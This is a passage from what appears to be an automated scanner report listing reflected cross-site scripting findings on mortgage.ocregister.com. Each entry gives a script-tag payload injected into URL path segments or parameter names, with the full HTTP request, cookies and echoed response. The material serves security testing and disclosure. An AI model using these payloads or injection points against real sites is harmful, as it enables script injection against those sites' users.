Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010f2292\"><script>alert(1)</script>bcdb1fec87/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310bd"><script>alert(1)</script>7a47a846288 was submitted in the REST URL parameter 2. This input was echoed as 310bd\"><script>alert(1)</script>7a47a846288 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/03310bd"><script>alert(1)</script>7a47a846288/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03310bd\"><script>alert(1)</script>7a47a846288/feed/" /> ...[SNIP]...
1.326. http://mortgage.ocregister.com/2010/03/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768b"><script>alert(1)</script>54bb9743afd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6768b\"><script>alert(1)</script>54bb9743afd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/03/?6768b"><script>alert(1)</script>54bb9743afd=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03/?6768b\"><script>alert(1)</script>54bb9743afd=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca09"><script>alert(1)</script>d2b6ccdfeec was submitted in the REST URL parameter 1. This input was echoed as 4ca09\"><script>alert(1)</script>d2b6ccdfeec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20104ca09"><script>alert(1)</script>d2b6ccdfeec/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104ca09\"><script>alert(1)</script>d2b6ccdfeec/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7ae"><script>alert(1)</script>1e9af29e281 was submitted in the REST URL parameter 2. This input was echoed as 2e7ae\"><script>alert(1)</script>1e9af29e281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/042e7ae"><script>alert(1)</script>1e9af29e281/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/042e7ae\"><script>alert(1)</script>1e9af29e281/feed/" /> ...[SNIP]...
1.329. http://mortgage.ocregister.com/2010/04/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 554c6"><script>alert(1)</script>0a80980ac2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 554c6\"><script>alert(1)</script>0a80980ac2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/04/?554c6"><script>alert(1)</script>0a80980ac2b=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/04/?554c6\"><script>alert(1)</script>0a80980ac2b=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b94"><script>alert(1)</script>a62b666be76 was submitted in the REST URL parameter 1. This input was echoed as e7b94\"><script>alert(1)</script>a62b666be76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010e7b94"><script>alert(1)</script>a62b666be76/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e7b94\"><script>alert(1)</script>a62b666be76/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedbd"><script>alert(1)</script>11ff887daaf was submitted in the REST URL parameter 2. This input was echoed as bedbd\"><script>alert(1)</script>11ff887daaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/05bedbd"><script>alert(1)</script>11ff887daaf/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05bedbd\"><script>alert(1)</script>11ff887daaf/feed/" /> ...[SNIP]...
1.332. http://mortgage.ocregister.com/2010/05/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f28"><script>alert(1)</script>8593dcd5118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f28\"><script>alert(1)</script>8593dcd5118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/05/?b0f28"><script>alert(1)</script>8593dcd5118=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05/?b0f28\"><script>alert(1)</script>8593dcd5118=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a080d"><script>alert(1)</script>c86de3d6ec3 was submitted in the REST URL parameter 1. This input was echoed as a080d\"><script>alert(1)</script>c86de3d6ec3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010a080d"><script>alert(1)</script>c86de3d6ec3/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010a080d\"><script>alert(1)</script>c86de3d6ec3/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23a00"><script>alert(1)</script>ebbc17fb5f6 was submitted in the REST URL parameter 2. This input was echoed as 23a00\"><script>alert(1)</script>ebbc17fb5f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/0623a00"><script>alert(1)</script>ebbc17fb5f6/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0623a00\"><script>alert(1)</script>ebbc17fb5f6/feed/" /> ...[SNIP]...
1.335. http://mortgage.ocregister.com/2010/06/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528df"><script>alert(1)</script>67a958dbc2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 528df\"><script>alert(1)</script>67a958dbc2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/06/?528df"><script>alert(1)</script>67a958dbc2c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 103917
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/06/?528df\"><script>alert(1)</script>67a958dbc2c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3740"><script>alert(1)</script>9aa5f5044ac was submitted in the REST URL parameter 1. This input was echoed as e3740\"><script>alert(1)</script>9aa5f5044ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010e3740"><script>alert(1)</script>9aa5f5044ac/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e3740\"><script>alert(1)</script>9aa5f5044ac/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 737f7"><script>alert(1)</script>3e0b1b344d0 was submitted in the REST URL parameter 2. This input was echoed as 737f7\"><script>alert(1)</script>3e0b1b344d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/07737f7"><script>alert(1)</script>3e0b1b344d0/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07737f7\"><script>alert(1)</script>3e0b1b344d0/feed/" /> ...[SNIP]...
1.338. http://mortgage.ocregister.com/2010/07/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2010/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b75"><script>alert(1)</script>5819d4315a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0b75\"><script>alert(1)</script>5819d4315a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/07/?c0b75"><script>alert(1)</script>5819d4315a4=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07/?c0b75\"><script>alert(1)</script>5819d4315a4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4246e"><script>alert(1)</script>71ad8bebe0b was submitted in the REST URL parameter 1. This input was echoed as 4246e\"><script>alert(1)</script>71ad8bebe0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20104246e"><script>alert(1)</script>71ad8bebe0b/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
